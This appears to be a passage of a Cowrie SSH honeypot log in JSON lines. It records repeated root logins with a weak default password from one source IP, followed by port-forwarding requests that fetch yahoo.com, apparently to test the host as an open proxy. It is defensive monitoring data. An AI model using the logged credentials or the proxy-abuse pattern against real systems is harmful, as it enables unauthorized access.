{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:06:35.417989Z","src_ip":"213.209.150.239","session":"8037ebbdc90c"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:06:35.699878Z","src_ip":"213.209.150.239","session":"8037ebbdc90c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":21029,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:21029","sensor":"my-vps","timestamp":"2025-08-26T01:06:35.757585Z","session":"8037ebbdc90c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:35.814645Z","src_ip":"213.209.150.239","session":"8037ebbdc90c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":24423,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:24423","sensor":"my-vps","timestamp":"2025-08-26T01:06:35.971110Z","session":"8037ebbdc90c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:36.028147Z","src_ip":"213.209.150.239","session":"8037ebbdc90c"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:06:36.085989Z","src_ip":"213.209.150.239","session":"8037ebbdc90c"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":42700,"dst_ip":"1.2.3.4","dst_port":22,"session":"c217e7461c77","protocol":"ssh","message":"New connection: 213.209.150.239:42700 (1.2.3.4:22) [session: c217e7461c77]","sensor":"my-vps","timestamp":"2025-08-26T01:06:36.132265Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:06:36.132858Z","src_ip":"213.209.150.239","session":"c217e7461c77"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:06:36.180381Z","src_ip":"213.209.150.239","session":"c217e7461c77"}
{"eventid":"cowrie.login.failed","username":"bb","password":"123456","message":"login attempt [bb/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T01:06:36.267546Z","src_ip":"27.112.78.170","session":"92f994e1c0a8"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:06:36.415023Z","src_ip":"213.209.150.239","session":"c217e7461c77"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":21897,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:21897","sensor":"my-vps","timestamp":"2025-08-26T01:06:36.464089Z","session":"c217e7461c77"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:36.511370Z","src_ip":"213.209.150.239","session":"c217e7461c77"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":11858,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:11858","sensor":"my-vps","timestamp":"2025-08-26T01:06:36.645424Z","session":"c217e7461c77"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:36.692572Z","src_ip":"213.209.150.239","session":"c217e7461c77"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:06:36.740447Z","src_ip":"213.209.150.239","session":"c217e7461c77"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":42738,"dst_ip":"1.2.3.4","dst_port":22,"session":"ada3178033c2","protocol":"ssh","message":"New connection: 213.209.150.239:42738 (1.2.3.4:22) [session: ada3178033c2]","sensor":"my-vps","timestamp":"2025-08-26T01:06:36.786464Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:06:36.787229Z","src_ip":"213.209.150.239","session":"ada3178033c2"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:06:36.834020Z","src_ip":"213.209.150.239","session":"ada3178033c2"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:06:37.067763Z","src_ip":"213.209.150.239","session":"ada3178033c2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":11322,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:11322","sensor":"my-vps","timestamp":"2025-08-26T01:06:37.115586Z","session":"ada3178033c2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:37.162772Z","src_ip":"213.209.150.239","session":"ada3178033c2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":5014,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:5014","sensor":"my-vps","timestamp":"2025-08-26T01:06:37.297235Z","session":"ada3178033c2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:37.344237Z","src_ip":"213.209.150.239","session":"ada3178033c2"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:06:37.391854Z","src_ip":"213.209.150.239","session":"ada3178033c2"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":42802,"dst_ip":"1.2.3.4","dst_port":22,"session":"f7dcad187df3","protocol":"ssh","message":"New connection: 213.209.150.239:42802 (1.2.3.4:22) [session: f7dcad187df3]","sensor":"my-vps","timestamp":"2025-08-26T01:06:37.447991Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:06:37.448966Z","src_ip":"213.209.150.239","session":"f7dcad187df3"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:06:37.505707Z","src_ip":"213.209.150.239","session":"f7dcad187df3"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:06:37.536347Z","src_ip":"27.112.78.170","session":"92f994e1c0a8"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:06:37.787957Z","src_ip":"213.209.150.239","session":"f7dcad187df3"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":18962,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:18962","sensor":"my-vps","timestamp":"2025-08-26T01:06:37.845517Z","session":"f7dcad187df3"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:37.902459Z","src_ip":"213.209.150.239","session":"f7dcad187df3"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":30465,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:30465","sensor":"my-vps","timestamp":"2025-08-26T01:06:38.059318Z","session":"f7dcad187df3"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:38.116749Z","src_ip":"213.209.150.239","session":"f7dcad187df3"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:06:38.174296Z","src_ip":"213.209.150.239","session":"f7dcad187df3"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":42872,"dst_ip":"1.2.3.4","dst_port":22,"session":"33d821bedb11","protocol":"ssh","message":"New connection: 213.209.150.239:42872 (1.2.3.4:22) [session: 33d821bedb11]","sensor":"my-vps","timestamp":"2025-08-26T01:06:38.220155Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:06:38.230401Z","src_ip":"213.209.150.239","session":"33d821bedb11"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:06:38.267511Z","src_ip":"213.209.150.239","session":"33d821bedb11"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:06:38.501825Z","src_ip":"213.209.150.239","session":"33d821bedb11"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":21338,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:21338","sensor":"my-vps","timestamp":"2025-08-26T01:06:38.549664Z","session":"33d821bedb11"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:38.597428Z","src_ip":"213.209.150.239","session":"33d821bedb11"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":3664,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:3664","sensor":"my-vps","timestamp":"2025-08-26T01:06:38.733433Z","session":"33d821bedb11"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:38.780478Z","src_ip":"213.209.150.239","session":"33d821bedb11"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:06:38.828200Z","src_ip":"213.209.150.239","session":"33d821bedb11"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":42926,"dst_ip":"1.2.3.4","dst_port":22,"session":"784996e31894","protocol":"ssh","message":"New connection: 213.209.150.239:42926 (1.2.3.4:22) [session: 784996e31894]","sensor":"my-vps","timestamp":"2025-08-26T01:06:38.874278Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:06:38.874974Z","src_ip":"213.209.150.239","session":"784996e31894"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh